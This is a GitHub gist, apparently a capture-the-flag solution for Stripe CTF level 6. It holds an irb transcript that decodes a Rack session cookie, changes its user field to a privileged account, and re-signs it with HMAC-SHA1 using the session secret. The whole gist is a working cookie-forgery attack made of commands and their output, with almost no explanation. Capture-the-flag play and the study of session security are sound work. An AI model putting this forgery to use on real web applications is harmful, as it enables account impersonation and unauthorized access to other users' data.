Skip to content

Instantly share code, notes, and snippets.

@philfreo
Created October 11, 2012 16:45
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save philfreo/3873776 to your computer and use it in GitHub Desktop.
Stripe CTF Level 06 Session/Cookie Hack
// See https://github.com/rack/rack/blob/master/lib/rack/session/cookie.rb
1.9.3p194 :096 > data = "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5
1.9.3p194 :097"> OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F
1.9.3p194 :098"> TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy
1.9.3p194 :099"> Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5
1.9.3p194 :100"> Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw
1.9.3p194 :101"> YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx
1.9.3p194 :102"> MDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3
1.9.3p194 :103"> VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p
1.9.3p194 :104"> ZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh
1.9.3p194 :105"> ZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==
1.9.3p194 :106"> "
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXIiDXBoaWxmcmVvIg9jc3JmLnRva2VuIjEzOWRRampaV0s3\nVDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJYnpNQzlXbDFzPSIPc2Vzc2lvbl9p\nZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4N2FlODRkYTkzZjIyOGI1ZTM0OWZh\nZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n"
1.9.3p194 :107 > OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
=> "6310248bab6197cf93953a16a9a407f862bce45a"
1.9.3p194 :108 >
1.9.3p194 :117 >
1.9.3p194 :118 > data = Marshal.load(data.unpack('m').first)
=> {"tracking"=>{"HTTP_USER_AGENT"=>"6906a924698f710c8960792ba519ea285ecbed86", "HTTP_ACCEPT_ENCODING"=>"a0bfc876d68fe7aea700da5ea8925abac6f2f794", "HTTP_ACCEPT_LANGUAGE"=>"dd065ed263c67d799f943ab6c39b55c5e008cbb5"}, "csrf"=>"57e34024aba4b0c5a93482cdb3310ef155351c22224b41087f90162cc8107d1b", "user"=>"philfreo", "csrf.token"=>"39dQjjZWK7T4r4VNdTZHBvupvCEvtllfGIbzMC9Wl1s=", "session_id"=>"20b2353b5fd6520b3b4587ae84da93f228b5e349fafd789ddc39888c9970ac1d"}
1.9.3p194 :119 > data['user'] = 'level07-password-holder'
=> "level07-password-holder"
1.9.3p194 :120 > data = [Marshal.dump(data)].pack('m')
=> "BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5\nOGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F\nTkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy\nZjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5\nZjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw\nYzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx\nMDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j\nc3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ\nYnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4\nN2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==\n"
1.9.3p194 :121 > sig = OpenSSL::HMAC.hexdigest(OpenSSL::Digest::SHA1.new, secret, data)
=> "992cee0782e5fad2157f777bf27eca32979cb411"
1.9.3p194 :122 >
1.9.3p194 :123 >
1.9.3p194 :124 >
1.9.3p194 :125 > puts data << '--' << sig
BAh7CiINdHJhY2tpbmd7CCIUSFRUUF9VU0VSX0FHRU5UIi02OTA2YTkyNDY5
OGY3MTBjODk2MDc5MmJhNTE5ZWEyODVlY2JlZDg2IhlIVFRQX0FDQ0VQVF9F
TkNPRElORyItYTBiZmM4NzZkNjhmZTdhZWE3MDBkYTVlYTg5MjVhYmFjNmYy
Zjc5NCIZSFRUUF9BQ0NFUFRfTEFOR1VBR0UiLWRkMDY1ZWQyNjNjNjdkNzk5
Zjk0M2FiNmMzOWI1NWM1ZTAwOGNiYjUiCWNzcmYiRTU3ZTM0MDI0YWJhNGIw
YzVhOTM0ODJjZGIzMzEwZWYxNTUzNTFjMjIyMjRiNDEwODdmOTAxNjJjYzgx
MDdkMWIiCXVzZXJJIhxsZXZlbDA3LXBhc3N3b3JkLWhvbGRlcgY6BkVUIg9j
c3JmLnRva2VuIjEzOWRRampaV0s3VDRyNFZOZFRaSEJ2dXB2Q0V2dGxsZkdJ
YnpNQzlXbDFzPSIPc2Vzc2lvbl9pZCJFMjBiMjM1M2I1ZmQ2NTIwYjNiNDU4
N2FlODRkYTkzZjIyOGI1ZTM0OWZhZmQ3ODlkZGMzOTg4OGM5OTcwYWMxZA==
--992cee0782e5fad2157f777bf27eca32979cb411
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment